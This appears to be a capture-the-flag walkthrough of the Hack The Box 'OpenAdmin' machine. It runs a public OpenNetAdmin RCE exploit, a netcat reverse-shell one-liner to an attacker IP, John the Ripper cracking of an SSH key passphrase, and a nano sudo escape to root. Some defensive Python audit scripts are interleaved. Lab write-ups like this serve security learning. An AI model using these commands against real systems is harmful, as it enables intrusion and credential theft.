OpenAdmin-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: OpenNetAdmin v18.1.1 command execution, sensitive information disclosure in a MySQL database configuration file, analysis of unusual Linux processes, sensitive information disclosure in an apache2 configuration file, id_rsa decryption, privilege escalation via a nano sudo misconfiguration

Reference: https://github.com/rafaelbaldasso/CTF-Writeups/blob/main/HackTheBox/OpenAdmin.md

0x01 Getting user access

1. Get the IP address: 10.10.10.171

2. Scan the open ports to see which services are exposed

sudo nmap -sT -sV -sC -O -p"22,80," "10.10.10.171"

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)

3. Port 80 only serves the Apache default page, so I moved on to directory enumeration

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.171 --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.171
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/artwork (Status: 301) [Size: 314] [--> http://10.10.10.171/artwork/]
/index.html (Status: 200) [Size: 10918]
/music (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.171
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.171/_23-12-09_22-51-28.txt

Target: http://10.10.10.171/

[22:51:28] Starting:
[22:51:47] 403 - 277B - /.ht_wsr.txt
[22:51:47] 403 - 277B - /.htaccess.bak1
[22:51:47] 403 - 277B - /.htaccess.orig
[22:51:47] 403 - 277B - /.htaccess.sample
[22:51:47] 403 - 277B - /.htaccess.save
[22:51:47] 403 - 277B - /.htaccess_extra
[22:51:47] 403 - 277B - /.htaccess_orig
[22:51:47] 403 - 277B - /.htaccess_sc
[22:51:47] 403 - 277B - /.htaccessBAK
[22:51:47] 403 - 277B - /.htaccessOLD
[22:51:47] 403 - 277B - /.htaccessOLD2
[22:51:47] 403 - 277B - /.html
[22:51:47] 403 - 277B - /.htm
[22:51:47] 403 - 277B - /.htpasswd_test
[22:51:47] 403 - 277B - /.htpasswds
[22:51:47] 403 - 277B - /.httr-oauth
[22:51:51] 403 - 277B - /.php
[22:53:26] 301 - 312B - /music -> http://10.10.10.171/music/
[22:53:31] 301 - 310B - /ona -> http://10.10.10.171/ona/
[22:53:48] 403 - 277B - /server-status
[22:53:48] 403 - 277B - /server-status/

Task Completed

4. This turned up three sites

http://10.10.10.171/artwork/

http://10.10.10.171/music/

http://10.10.10.171/ona/

5. Looking at the three sites, the attack surface is clearly OpenNetAdmin v18.1.1; a Google search turned up an exploit for it

https://github.com/amriunix/ona-rce

6. Trying it confirmed that the vulnerability is present

┌──(kali㉿kali)-[~/桌面]
└─$ python3 ona-rce.py check http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!

7. With it, I obtained the first foothold shell

┌──(kali㉿kali)-[~/桌面]
└─$ python3 ona-rce.py exploit http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 443 >/tmp/f

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.171] 41744
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www$

8. Enumerating the current directory tree took several wrong turns, but it eventually yielded a password, and trying it gave access as the jimmy user

www-data@openadmin:/opt/ona/www$ ls -la /home
ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 2019 .
drwxr-xr-x 24 root root 4096 Aug 17 2021 ..
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 2019 jimmy
drwxr-x--- 5 joanna joanna 4096 Jul 27 2021 joanna
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www$ ls -la
ls -la
total 72
drwxrwxr-x 10 www-data www-data 4096 Nov 22 2019 .
drwxr-x--- 7 www-data www-data 4096 Nov 21 2019 ..
-rw-rw-r-- 1 www-data www-data 1970 Jan 3 2018 .htaccess.example
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php

$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);

?>www-data@openadmin:/opt/ona/www/local/config$

┌──(kali㉿kali)-[~/桌面]
└─$ ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ED25519) to the list of known hosts.
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Dec 9 16:01:59 UTC 2023

System load: 0.0 Processes: 177
Usage of /: 30.9% of 7.81GB Users logged in: 0
Memory usage: 14% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.


Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$

9. There was no user flag in this home directory, so joanna's account was probably needed. Continuing enumeration with ss -tln and similar commands revealed an internal web site served by another process, and enumerating the apache2 files turned up its configuration

jimmy@openadmin:/etc/apache2$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
jimmy@openadmin:/etc/apache2$

jimmy@openadmin:/etc/apache2$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 2019 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 2019 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 2019 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 2019 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
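The misconfiguration behind steps 9 and 10 is that this vhost executes PHP as joanna (AssignUserID) while its DocumentRoot is owned by jimmy and writable by the internal group, so anyone in that group can place code that runs as joanna. The following audit is an added example, not code from the writeup or from the box: parse_vhosts and audit_docroot are hypothetical names, the sample config is the internal.conf above, and the ownership values are the ones printed by ls -la.

```python
import re
import stat

# Constructed sample: the internal.conf shown above, as an inline string.
SAMPLE_CONF = """\
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
    <IfModule mpm_itk_module>
        AssignUserID joanna joanna
    </IfModule>
</VirtualHost>
"""

def parse_vhosts(conf_text):
    """Return one dict per <VirtualHost> with its DocumentRoot and mpm_itk AssignUserID."""
    vhosts = []
    for body in re.findall(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", conf_text, re.S):
        docroot = re.search(r"^\s*DocumentRoot\s+(\S+)", body, re.M)
        assign = re.search(r"^\s*AssignUserID\s+(\S+)\s+(\S+)", body, re.M)
        vhosts.append({"docroot": docroot.group(1) if docroot else None,
                       "run_user": assign.group(1) if assign else None,
                       "run_group": assign.group(2) if assign else None})
    return vhosts

def audit_docroot(vhost, owner, group, mode):
    """Report who, other than the user the vhost runs as, can drop files into its DocumentRoot.
    owner/group are the directory's owner and group names, mode its permission bits (e.g. 0o770)."""
    run_user, run_group = vhost["run_user"], vhost["run_group"]
    findings = []
    if run_user is None:
        return findings  # no user switch: scripts run as the Apache user, nothing to compare against
    if owner != run_user:  # the owner can always chmod, so ownership alone is a finding
        findings.append(f"DocumentRoot owned by {owner} but scripts execute as {run_user}")
    if mode & stat.S_IWGRP and group != run_group:
        findings.append(f"DocumentRoot writable by group {group}, which is not {run_user}'s group {run_group}")
    if mode & stat.S_IWOTH:
        findings.append("DocumentRoot is world-writable")
    return findings

if __name__ == "__main__":
    # Ownership and mode exactly as `ls -la /var/www/internal` printed them: drwxrwx--- jimmy internal
    for vh in parse_vhosts(SAMPLE_CONF):
        for f in audit_docroot(vh, "jimmy", "internal", 0o770):
            print(f"[!] {vh['docroot']}: {f}")
```

On a live host, feed audit_docroot the names from pwd.getpwuid/grp.getgrgid and stat.S_IMODE(os.stat(docroot).st_mode).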

10. Here we see that fetching main.php directly returns joanna's id_rsa file.

jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

11. SSH login with the key asked for a passphrase, so I set about cracking it

┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john id_rsa > id_rsa.txt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
[sudo] kali 的密码:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (hash)
1g 0:00:00:01 DONE (2023-12-10 00:48) 0.6024g/s 5767Kp/s 5767Kc/s 5767KC/s bloodninjas..bloodmoon007
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
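Step 11 succeeds so quickly because the key is in the legacy PEM format (Proc-Type/DEK-Info headers), whose passphrase protection is a single MD5 pass, exactly the "MD5/AES, iteration count 1" that john prints above. As an added defender-side example, not from the writeup, this checker tells that format apart from openssh-key-v1 with bcrypt and reports the KDF rounds; the key_protection/is_weakly_protected names and the "md5-evp-bytestokey" label are mine, and the OpenSSH sample is a synthetic header, not a real key.

```python
import base64
import re
import struct
MAGIC = b"openssh-key-v1\0"

def _ssh_string(data):  # SSH wire string: uint32 big-endian length + bytes
    return struct.pack(">I", len(data)) + data

def _read_string(blob, off):  # decode one SSH wire string at off -> (bytes, next_off)
    (n,) = struct.unpack_from(">I", blob, off)
    return blob[off + 4:off + 4 + n], off + 4 + n

# Constructed sample 1: the legacy PEM header from the curl output above, key body omitted.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
...base64 body omitted...
-----END RSA PRIVATE KEY-----
"""
# Constructed sample 2: a synthetic openssh-key-v1 header only (not a usable key):
# cipher aes256-ctr, KDF bcrypt with a 16-byte zero salt and 16 rounds, one key.
_HDR = (MAGIC + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt")
        + _ssh_string(_ssh_string(b"\0" * 16) + struct.pack(">I", 16)) + struct.pack(">I", 1))
OPENSSH_KEY = ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(_HDR).decode()
               + "\n-----END OPENSSH PRIVATE KEY-----\n")

def key_protection(pem_text):
    """Return (format, cipher, kdf, rounds) for a private key file.
    Legacy PEM gets rounds=1: OpenSSL's EVP_BytesToKey does one MD5 pass over passphrase+salt,
    which is the 'MD5/AES ... iteration count 1' that john reports in the session above."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem_text:
        b64 = "".join(l for l in pem_text.splitlines() if l and not l.startswith("-----"))
        blob = base64.b64decode(b64)
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return ("openssh-v1", cipher.decode(), kdf.decode(), rounds)
    dek = re.search(r"^DEK-Info:\s*([^,\s]+)", pem_text, re.M)
    if dek and re.search(r"^Proc-Type:\s*4,ENCRYPTED", pem_text, re.M):
        return ("legacy-pem", dek.group(1), "md5-evp-bytestokey", 1)
    return ("legacy-pem", "none", "none", 0)

def is_weakly_protected(pem_text, min_rounds=16):
    """Unencrypted, legacy single-pass KDF, or fewer bcrypt rounds than OpenSSH's default of 16."""
    _fmt, cipher, kdf, rounds = key_protection(pem_text)
    return cipher == "none" or kdf != "bcrypt" or rounds < min_rounds
```

Keys flagged here should be regenerated or re-encrypted with `ssh-keygen -p -o -a <rounds>`, which rewrites them in the bcrypt-protected format.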

12. We then retrieved the first flag, the user flag

┌──(kali㉿kali)-[~/桌面]
└─$ chmod 600 hash

┌──(kali㉿kali)-[~/桌面]
└─$ ssh joanna@10.10.10.171 -i hash
Enter passphrase for key 'hash':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Dec 9 16:53:45 UTC 2023

System load: 0.0 Processes: 182
Usage of /: 31.0% of 7.81GB Users logged in: 1
Memory usage: 15% IP address for ens160: 10.10.10.171
Swap usage: 0%

* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$
joanna@openadmin:~$cat /home/joanna/user.txt
33217857bc668c78816c04226aff333

0x02 Getting root

13. Checking sudo showed that nano can be used to escalate to the final privilege level

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass

User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:~$

14. The gtfobins entry gave the escalation method; it worked, and I read the root flag

https://gtfobins.github.io/gtfobins/nano/

sudo nano
^R^X
reset; sh 1>&0 2>&0

Command to execute: reset; sh 1>&0 2>&0#
# idet Help ^X Read File
uid=0(root) gid=0(root) groups=0(root)M-F New Buffer
# id
uid=0(root) gid=0(root) groups=0(root)
#
#
# cat /root/root.txt
a90b7857bc668c78816c04226aff903c
#
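Steps 13 and 14 hinge on a sudo rule that grants an interactive editor, which the GTFOBins entry shows is equivalent to granting a shell. As an added example that is not part of the writeup, this audits `sudo -l` output for such rules and suggests sudoedit as the replacement; parse_sudo_l, audit_sudo_l and the editor list are my assumptions, and the sample listing is the one above plus a constructed hardened line.

```python
import os
import re
import shlex

# Editors with a built-in "run a command" feature (the GTFOBins page linked above documents the
# keystrokes), so a sudo rule on any of them is effectively a sudo rule on a shell.
SHELL_ESCAPING_EDITORS = {"nano", "pico", "vi", "vim", "view", "emacs"}

# Constructed sample: the `sudo -l` listing from the writeup, plus a hardened rule for contrast.
SUDO_L_OUTPUT = """\
Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) sudoedit /opt/priv
"""

# (runas) [TAG: ...] command args   -- one command line of a `sudo -l` listing
CMD_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_l(text):
    """Return (user, runas, tags, argv) for every command line after the 'User X may run' header."""
    user, rules = None, []
    for line in text.splitlines():
        m = re.match(r"^User (\S+) may run the following commands", line)
        if m:
            user = m.group(1)
            continue
        m = CMD_RE.match(line.strip())
        if user and m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((user, m.group("runas"), tags, shlex.split(m.group("cmd"))))
    return rules

def audit_sudo_l(text):
    """Flag rules that grant an interactive editor. The fix is sudoedit: it copies the file, runs the
    editor unprivileged as the caller, and only the final copy-back happens as the target user."""
    findings = []
    for user, runas, tags, argv in parse_sudo_l(text):
        prog = os.path.basename(argv[0])
        if prog in SHELL_ESCAPING_EDITORS:
            how = "without a password" if "NOPASSWD" in tags else "with a password"
            findings.append(f"{user} can run {prog} as {runas} {how} ({' '.join(argv)}): "
                            f"replace with 'sudoedit {' '.join(argv[1:])}'")
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L_OUTPUT):
        print("[!]", f)
```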

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/222


OpenAdmin-htb-writeup
https://sh1yan.top/2023/12/10/OpenAdmin-htb-writeup/
Author: shiyan
Published: 10 December 2023